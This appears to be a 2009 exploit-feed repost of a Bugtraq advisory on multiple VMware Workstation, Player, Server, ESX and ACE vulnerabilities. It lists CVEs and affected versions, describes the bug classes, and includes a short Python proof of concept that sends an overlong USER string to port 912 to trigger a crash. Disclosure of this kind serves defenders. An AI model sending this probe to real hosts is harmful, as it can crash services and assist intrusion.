|
Feeds -
Exploits
|
|
Written by laurent gaffie
|
|
Sunday, 05 April 2009 22:45 |
VMware Hosted Products VMSA-2009-0005 Multiple Remote Vulnerabilities
-\\Bugtraq ID:
34373
-\\Class:
Unknown
-\\CVE:
CVE-2008-4916
CVE-2008-3761
CVE-2009-1146
CVE-2009-1147
CVE-2009-0910
CVE-2009-0909
CVE-2009-0908
CVE-2009-0177
CVE-2009-0518
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Apr 04 2009 12:00AM
-\\Updated:
Apr 04 2009 12:00AM
-\\Credit:
laurent gaffie
-\\Vulnerable:
VMWare Workstation for Linux 0
VMWare Workstation 6.5.1
VMWare Workstation 6.5 build 118166
VMWare Workstation 6.0.5 build 109488
VMWare Workstation 6.0.5
VMWare Workstation 6.0.4 build 93057
VMWare Workstation 6.0.4
VMWare Workstation 6.0.3 Build 80004
VMWare Workstation 6.0.3
VMWare Workstation 6.0.2
VMWare Workstation 6.0.1
VMWare Server 1.0.8 build 126538
VMWare Server 1.0.7 build 108231
VMWare Server 1.0.7
VMWare Server 1.0.6 build 91891
VMWare Server 1.0.6
VMWare Server 1.0.5 Build 80187
VMWare Server 1.0.5
VMWare Server 1.0.4
VMWare Server 1.0.3
VMWare Server 1.0.2
VMWare Player 2.5.1
VMWare Player 2.5 build 118166
VMWare Player 2.0.5 build 109488
VMWare Player 2.0.5
VMWare Player 2.0.4 build 93057
VMWare Player 2.0.4
VMWare Player 2.0.3 Build 80004
VMWare Player 2.0.2
VMWare Player 2.0.1
VMWare Player 2.0
VMWare Player 1.0.9 build 126128
VMWare Player 1.0.8 build 108000
VMWare Player 1.0.8
VMWare Player 1.0.7 build 91707
VMWare Player 1.0.6 Build 80404
VMWare Player 1.0.6
VMWare Player 1.0.5
VMWare Player 1.0.4
VMWare Player 1.0.3
VMWare Player 1.0.2
VMWare Player 1.0.1 Build 19317
VMWare ESXi Server 3.5
VMWare ESX Server 3.0.3
VMWare ESX Server 3.0.2
VMWare ESX Server 3.5
VMWare ACE 2.5.1
VMWare ACE 2.5 build 118166
VMWare ACE 2.0.5 build 109488
VMWare ACE 2.0.5
VMWare ACE 2.0.3
VMWare ACE 2.0.2 build 93057
VMWare ACE 2.0.2
VMWare ACE 2.0.1
VMWare ACE 2.0
VMWare ACE 1.0.8 build 125922
VMWare ACE 1.0.7 build 108880
VMWare ACE 1.0.7
VMWare ACE 1.0.5
VMWare ACE 1.0.4
VMWare ACE 1.0.3
VMWare ACE 1.0.2 Build 19206
VMWare ACE 1.0.2
VMWare ACE 1.0
VMWare ACE 1.0.5 build 79846
-\\Discussion
VMware hosted products are prone to multiple remote vulnerabilities, including:
- Multiple denial-of-service vulnerabilities
- A privilege-escalation vulnerability
- Multiple heap-based buffer-overflow vulnerabilities
- An unauthorized access vulnerability
- An information-disclosure vulnerability
An attacker can exploit these issues to crash the affected applications,
execute arbitrary code, compromise the affected applications, gain unauthorized
access and gain access to sensitive information. Other attacks are also possible.
-\\Exploit(s)/PoC(s):
Currently we are not aware of any working exploits. If you feel we are in error
or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
===============================================================
33095.py
^^^^^^^^^
import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = 'A' * 350
target = '192.168.0.102'
port = 912
s.connect((target, port))
data = s.recv(1024)
s.send('USER '+buff+'\r\n')
data = s.recv(1024)
s.send('PASS yo \r\n')
data = s.recv(1024)
print " [+] sending dummy payload"
s.close()
print " [+] done! "
-\\Solution
Currently we are not aware of any vendor-supplied patches for these issues.
If you feel we are in error or if you are aware of more recent information,
please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--VMware Homepage
http://www.vmware.co (VMware)
|
